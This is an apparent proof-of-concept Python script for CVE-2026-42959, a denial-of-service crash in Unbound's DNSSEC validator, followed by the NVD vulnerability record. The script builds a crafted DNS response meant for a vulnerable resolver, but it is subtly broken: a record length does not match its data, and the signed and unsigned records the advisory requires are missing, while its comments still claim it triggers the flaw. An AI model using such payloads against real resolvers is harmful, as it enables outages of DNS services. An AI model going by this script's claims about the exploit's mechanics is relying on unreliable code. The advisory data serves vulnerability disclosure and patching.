CVE-2026-42959

#!/usr/bin/env python3 """ PoC for CVE-2026-42959 (Unbound DNSSEC DoS) This script demonstrates the packet structure required to trigger the crash. It sends a crafted response with a DNAME record and specific glue records. Note: Requires a controlled DNSSEC signed domain environment. """ import socket import struct def build_dns_response(): # DNS Header # ID: 0x1234, Flags: Response, Authoritative, Recursion Available header = struct.pack('!HHHHHH', 0x1234, 0x8580, 1, 1, 0, 1) # Question Section qname = b'\x03www\x07example\x03com\x00' # www.example.com qtype = struct.pack('!H', 1) # A record qclass = struct.pack('!H', 1) # IN question = qname + qtype + qclass # Answer Section (DNAME to increase count) # Simplified representation of a DNAME record ans_name = b'\x03www\x07example\x03com\x00' ans_type = struct.pack('!H', 39) # DNAME type ans_class = struct.pack('!H', 1) ans_ttl = struct.pack('!I', 3600) ans_dlen = struct.pack('!H', 15) ans_data = b'\x05alias\x07example\x03com\x00' answer = ans_name + ans_type + ans_class + ans_ttl + ans_dlen + ans_data # Additional Section (Glue records to trigger uninitialized write) # This is where the off-by-one/write offset error occurs add_name = b'\x02ns\x07example\x03com\x00' add_type = struct.pack('!H', 1) # A record add_class = struct.pack('!H', 1) add_ttl = struct.pack('!I', 3600) add_dlen = struct.pack('!H', 4) add_data = socket.inet_aton('192.0.2.1') # Example IP additional = add_name + add_type + add_class + add_ttl + add_dlen + add_data return header + question + answer + additional if __name__ == "__main__": payload = build_dns_response() print(f"[+] Sending crafted DNS response payload ({len(payload)} bytes)...") # In a real scenario, this would be sent to a vulnerable Unbound resolver # via UDP/53 or used in a response to a query it initiates. # print(payload.hex())

{"cve": {"id": "CVE-2026-42959", "sourceIdentifier": "[email protected]", "published": "2026-05-20T10:16:27.903", "lastModified": "2026-05-20T22:51:00.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLnet Labs Unbound up to and including version 1.25.0 has a denial of service vulnerability in the DNSSEC validator that can lead to a crash given malicious upstream replies. When Unbound constructs chase-reply messages for validation, the code uses the wrong counter to calculate write offsets for ADDITIONAL section rrsets. DNAME duplication could increase the ANSWER section count and authority filtering could decrease the AUTHORITY section count and create an uninitialized array slot. Combining these two, the validator later dereferences this uninitialized pointer, causing an immediate process crash. An adversary controlling a DNSSEC-signed domain can trigger this bug with a single query by configuring a DNAME chain with unsigned CNAMEs and a response containing unsigned AUTHORITY records alongside signed ADDITIONAL glue records. Unbound 1.25.1 contains a patch with a fix to use the proper counters to calculate the write offsets."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Red", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-824"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nlnetlabs:unbound:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.25.1", "matchCriteriaId": "45EC9AEF-23EC-4ECC-A769-18DF07B2CAEC"}]}]}], "references": [{"url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42959.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}